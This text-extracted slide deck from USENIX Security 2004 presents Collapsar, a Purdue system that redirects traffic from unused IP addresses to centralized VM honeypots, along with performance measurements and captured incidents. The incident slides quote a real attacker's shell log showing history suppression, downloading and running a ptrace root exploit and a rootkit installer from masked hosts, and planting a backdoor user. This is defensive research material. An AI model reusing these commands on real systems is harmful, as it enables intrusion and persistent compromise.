Collapsar: A VM-Based Architecture for Network Attack Detention Center

Xuxian Jiang, Dongyan Xu

Department of Computer Sciences Center for Education and Research in Information

Assurance and Security (CERIAS) Purdue University

USENIX Security 2004USENIX Security 2004

Outline

Motivation Collapsar architecture and features Collapsar design, implementation, and

performance Collapsar deployment and real-world

incidents Conclusion and on-going work

Motivation

Need for network attack containment and monitoring Worm outbreaks (MSBlaster, Sasser…) Debian project servers hacked (Nov. 2003) PlanetLab nodes compromised (Dec. 2003) And more

Motivation

Promise of honeypots Providing insights into intruders’

motivations, tactics, and tools Highly concentrated datasets w/ low noise Low false-positive and false negative rate

Discovering unknown vulnerabilities/exploitations Example: CERT advisory CA-2002-01 (solaris CDE

subprocess control daemon – dtspcd)

Current Honeypot Operation

Individual honeypots Limited local view of attacks

Federation of distributed honeypots Deploying honeypots in different networks Exchanging logs and alerts

Problems Difficulties in distributed management Lack of honeypot expertise Inconsistency in security and management

policies Example: log format, sharing policy, exchange

frequency

Our Solution: Collapsar

Based on the HoneyFarm idea of Lance Spitzner

Achieving two (seemingly) conflicting goals Distributed honeypot presence Centralized honeypot operation

Key ideas Leveraging unused IP addresses in each

network Diverting corresponding traffic to a

“detention” center (transparently) Creating VM-based honeypots in the center

VM-based Honeypot

Collapsar Architecture

Redirector

Redirector Redirector

Correlation Engine

Management Station

Production Network

Production Network

Production Network

Collapsar Center

Attacker

Front-End

Comparison with Current Approaches

Overlay-based approach (e.g., NetBait, Domino overlay) Honeypots deployed in different sites Logs aggregated from distributed honeypots Data mining performed on aggregated log

information Key difference: where the attacks take place (on-site vs. off-site)

Comparison with Current Approaches

Sinkhole networking approach (e.g., iSink ) “Dark” space to monitor Internet

abnormality and commotion (e.g. msblaster worms)

Limited interaction for better scalability Key difference: contiguous large address

blocks (vs. scattered addresses)

Comparison with Current Approaches

Low-interaction approach (e.g., honeyd, iSink ) Highly scalable deployment Low security risks Key difference: emulated services (vs. real

things) Less effective to reveal unknown vulnerabilities Less effective to capture 0-day worms

Collapsar Design

Functional components Redirector Collapsar Front-End Virtual honeypots

Assurance modules Logging module Tarpitting module Correlation module

Functional Components Redirector

Running in each participating network Capturing traffic toward unused IP addresses Redirecting to Collapsar Front-End

Two implementation options Proxy-ARP approach

Longer latency Minimum change to network infrastructure

GRE (Generic Routing Encapsulation) approach Lower latency Requiring router re-configuration Missing attack traffic from inside a domain

Functional Components

Collapsar Front-End Dispatching incoming traffic to different

honeypots Transparent bridging

Mitigating security risks Transparent firewalling Packet re-writing

Assurance module plug-in Logging modules Tarpitting modules

Functional Components

Virtual honeypots VM-based high-interaction honeypots

VMware Enhanced User-Mode Linux (UML)

Commodity OS and popular services Linux, Windows, Solaris, FreeBSD Apache, samba, sendmail, named

Capability of forensic analysis System image snapshot / restoration

Assurance Modules Logging module

Traffic logging Where: Front-End and honeypots

Keystroke logging Where: honeypots

Tarpitting module Mitigating security risks

Where: Front-End

Correlation module Mining and correlation

(e.g., tcpdump, snort)(e.g., tcpdump, snort)

(e.g., sebek)(e.g., sebek)

(e.g., snort-inline)(e.g., snort-inline)

Measurement set-up

Metrics TCP throughput

Nock (http://www.cs.wisc.edu/~zandy/p/nock) ICMP latency

Performance Measurement

Dell PowerEdge Server (2.6GHz Xeon/2GB Memory)

Dell PowerEdge Server (2.6GHz Xeon/2GB Memory)Dell Desktop PC

(1.8GHz Pentium 4/768MB Memory)

Dell Desktop PC (1.8GHz Pentium 4/768MB Memory)

Collapsar Center

Collapsar Center

A

VMware or UMLVMware or UML

H

Redirector Front-End

TCP throughputTCP throughput

Measurement Results

Measurement Results

ICMP latencyICMP latency

Collapsar Deployment

Deployed in a local environment for a two-month period in 2003

Traffic redirected from five networks Three wired LANs One wireless LAN One DSL network

~ 40 honeypots analyzed so far Internet worms (MSBlaster, Enbiei, Nachi ) Interactive intrusions (Apache, Samba) OS: Windows, Linux, Solaris, FreeBSD

Incident: Apache Honeypot/VMware

Vulnerabilities Vul 1: Apache (CERT® CA-2002-17) Vul 2: Ptrace (CERT® VU-6288429)

Time-line Deployed: 23:44:03pm, 11/24/03 Compromised: 09:33:55am, 11/25/03

Attack monitoring Detailed log

http://www.cs.purdue.edu/homes/jiangx/collapsar

[2003-11-25 09:33:55 aaa.bb.c.126 7817 sh 48]export HISTFILE=/dev/null; echo; echo ' >>>> GAME OVER! Hackerz Win ;) <<<<'; echo; echo; echo "****** I AM IN '`hostname -f`' ******"; echo; if [ -r /etc/redhat-release ]; then echo `cat /etc/redhat-release`; elif [ -r /etc/suse-release ]; then echo SuSe `cat /etc/suse-release`; elif [ -r /etc/slackware-version ]; then echo Slackware `cat /etc/slackware-version`; fi; uname -a; id; echo

[2003-11-25 09:34:01 aaa.bb.c.126 7817 sh 48]cd /tmp[2003-11-25 09:34:07 aaa.bb.c.126 7817 sh 48]wget http://xxxxxxxxxxxxxxxxxxxxx.xx/0304-exploits/ptrace-kmod.c;gcc ptrace-kmod.c -o p;./p

1. Gaining a regular account: apache

2. Escalating to the root privilege

Incident: Apache Honeypot/VMware

[2003-11-25 09:35:46 aaa.bb.c.126 7838 sh 0]wget http://xxxxxxx.xx.xx/vip/xxxxxx/shv4.tar.gz;tar -xzf shv4.tar.gz;cd shv4;./setup rooter 1985

[2003-11-25 09:36:16 aaa.bb.c.126 8009 xntps 0]SSH-1.5-PuTTY-Release-0.53b[2003-11-25 09:36:57 aaa.bb.c.126 8009 xntps 0]cd /home;adduser ftpd;su ftpd[2003-11-25 09:37:00 aaa.bb.c.126 8009 xntps 0]cd ftpd;mkdir .logs;cd .logs[2003-11-25 09:37:04 aaa.bb.c.126 8009 xntps 0]wget http://xxxxxxx.xxx/archive/v1.2/iroffer1.2b22.tgz;tar -zvxf iroffer1.2b22.tgz;cd iroffer1.2b22;./Configure;make[2003-11-25 09:37:50 aaa.bb.c.126 8009 xntps 0]mv iroffer syst[2003-11-25 09:37:52 aaa.bb.c.126 8009 xntps 0]pico rpm[2003-11-25 09:38:01 aaa.bb.c.126 8009 xntps 0]./syst -b rpm/dev/null &

3. Installing a set of backdoors

4. Adding the ftp user and installing a

IRC-based ftp server

Incident: Apache Honeypot/VMware

Incident: Windows XP Honeypot/VMware

Vulnerability RPC DCOM Vul.

(Microsoft Security Bulletin MS03-026)

Time-line Deployed: 22:10:00pm,

11/26/03 MSBlaster: 00:36:47am,

11/27/03 Enbiei: 01:48:57am,

11/27/03 Nachi: 07:03:55am,

11/27/03

Log Correlation: Stepping Stoneiii.jjj.kkk.11 compromised a honeypot & installed a rootkit, which contained

an ssh backdoor

iii.jjj.kkk.11 compromised a honeypot & installed a rootkit, which contained

an ssh backdoor

xx.yyy.zzz.3 connected to the ssh backdoor using the same passwd

xx.yyy.zzz.3 connected to the ssh backdoor using the same passwd

Log Correlation: Network Scanning

Conclusions

A new architecture for attack containment and monitoring Distributed presence and centralized operation

of honeypots Good potential in attack correlation and log

mining Unique features

Aggregation of Scattered unused IP addresses Off-site (relative to participating networks) attack

occurrences and monitoring Real services for unknown vulnerability

revelation

On-going Work

Integration into trusted server architectures (SODA and Poly2)

On-demand honeypot customization Collapsar center federation Scalability

Testbed for worm containment (coming soon)

Thank you.

For more information:

Email: {dxu, jiangx}@cs.purdue.eduURL: www.cs.purdue.edu/~dxu

Google: “Purdue Collapsar friends”